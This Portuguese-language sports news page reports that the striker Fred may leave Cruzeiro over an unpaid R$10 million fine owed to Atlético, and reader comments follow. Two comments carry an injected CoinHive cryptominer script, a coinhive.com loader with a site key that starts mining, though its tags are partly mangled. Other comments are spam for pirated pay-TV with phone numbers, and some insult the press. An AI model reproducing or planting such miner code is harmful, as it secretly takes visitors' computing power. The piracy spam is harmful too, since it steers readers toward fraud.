logo

27/1/2018 13:56

Fred pode rescindir contrato com o Cruzeiro. Entenda

Fred pode rescindir contrato com o Cruzeiro. Entenda

Fred foi o segundo reforço do Cruzeiro para 2018 (Foto: Divulgação/Cruzeiro)

A multa de R$ 10 milhões cobrada pelo Atlético por causa da rescisão de Fred causa grande desconforto nos bastidores do Cruzeiro. Isso porque o clube celeste se comprometeu a fazer o pagamento, mas até agora não quitou o débito.


Fred deixou o Atlético no dia 23 de dezembro e assinou com o Cruzeiro. Antes de fechar contrato, o jogador se resguardou. Ele sabia que uma cláusula firmada com o Galo garantia que, se caso assinasse com a Raposa, teria de pagar uma multa de R$ 10 milhões. Com isso, o atleta informou o valor ao time celeste e ouviu da diretoria que se tornaria o real devedor.

Na cláusula, o atacante teria de fazer o pagamento no dia seguinte a sua regularização na Confederação Brasileira de Futebol (CBF). Isso aconteceu no dia 16 de janeiro, entretanto, até hoje o problema não foi resolvido.

A situação causa desconforto entre Fred e a diretoria. O jogador está documentado e espera que a situação seja resolvida o quanto antes. No entanto, já existe a possibilidade do jogador deixar a Raposa. A informação foi revelada pelo jornal OTempo e confirmada pela Gazeta Esportiva.

Fred está insatisfeito com a situação. Quando assinou com a Raposa, existiu a promessa e tudo foi colocado em contrato, que nada disso desgastaria a imagem do jogador, algo que vem acontecendo.



Em um dos documentos, Fred pediu a Raposa que a situação fosse resolvida de forma tranquila. “Diante dessa situação (da multa cobrada pelo Atlético), vossas senhorias (Wagner Pires de Sá e Itair Machado, presidente e vice do Cruzeiro) tenham interesse em prosseguir em conversas para uma possível contratação, eu gostaria de estabelecer desde logo que eu só me disporia a seguir para o Cruzeiro com o compromisso irrevogável e irretratável de que o Cruzeiro será o único responsável pelo pagamento da multa estipúlada pelo Atlético, devendo me manter indene a todo momneto e nunca me colocar como obrigado por esse pagamento… Fora isso, não me agradaria a circunstância de celebrar algo no dia de hoje para entrar em um litígio amanhã. Desse modo, seria necessário para mim também que o pagamento da penalidade fosse feito sem qualquer tipo de deiscussão com o Atlético, por parte minha ou do Cruzeiro”, colocou em documento assinado por Fred, Wagner Pires e Itair Machado.

O Cruzeiro, no entanto, pediu mais tempo.Em conversa com a Gazeta Esportiva há mais de uma semana, o clube disse que daria um posicionamento. Nessa sexta-feira, o clube pediu novo prazo. Em contato com a assessoria de imprensa do clube, a Gazeta ouviu que, “se caso o jurídico do Cruzeiro entenda que será necessário fazer o pagamento, o Cruzeiro vai arcar”.

Pouco depois de anunciar o jogador, o vice-presidente do Cruzeiro, Itair Machado, garantiu que já tem o dinheiro para fazer o pagamento, fruto de doações de empresários cruzeirenses. Na época, a Raposa disse ainda que se não fosse fazer o pagamento o dinheiro seria destinado para outras dívidas.

Desde sua regularização junto a CBF, o jogador já fez três jogos e não marcou gols

8337 visitas - Fonte: Gazeta Esportiva


Gaspar Dias     

ja nao basta a diretoria caloteira que tinhamos agora essa aí é igual a outra ..paga o que deve e pronto...isso desgasta demais..o Cruzeiro não merece isso aí...

Ricardo Dias     

Gente se Fred ficar paga, se sair paga, e ele ainda leva o Cruzeiro na justiça quando sair, vamos resolver isto aí diretoria, cobrar no campo.

Geraldo Magela     

a dietoria do Cruzeiro junto com o presidente tem que prosesar essas iprensa de merda eles estão louco para plantar uma crise no clube essas turma de filhos da puta

Rafael Pontes     

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Notícia de jornal tendencioso.E ainda perdem tempo em divulgar isso?

Rafael Pontes     

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Paga logo ou libera... pq palavra e palavra não fica dando margem de conversinha para as frangas não. Agora burro e o jogador q se sujeita a assinar um contrato com a revisão nestes termos. Paga e faz ele compensar em campo.

Josiel Mota     

a maior parte da imprensa mineira e franga,por isso vive tentando coloca crises no Cruzeiro. agora a diretoria do Cruzeiro ta de brincadeira viu já que tem que pagar os 10 milhões e deu a palavra, paga logo e ponto final #diretoriaamadora

pagar nada nao ele assinou contrato com as frangas ele q se vire para pagar...ou sai do maior de minas!!

incompetência pura. absurdo assumir isso. Se fosse empresa dele nem cogitaria pagar isso. Rescinde o contrato logo

pagar tudo isso, pelo futebol meia boca do Fred é loucura, deixa o cara ir.

se for verdade , é muita incompetência da diretoria do clube.

se for verdade, é muita incompetência da diretoria do cruzeiro.

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Sidnei Lopes     

conversa fiada

se tem que pagar. pague logo!

está imprensa gosta de causar polêmica.... o torcedor não gosta disto

Carlos Eduardo     

manda embora e pronto

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Campeonato Mineiro

S&# - 16:30 - Mineirão - PPV
Cruzeiro
Boa Esporte

Último jogo - Campeonato Mineiro

S&# - 16:30 - Mineião
Cruzeiro
1 0
Vila Nova

Classificação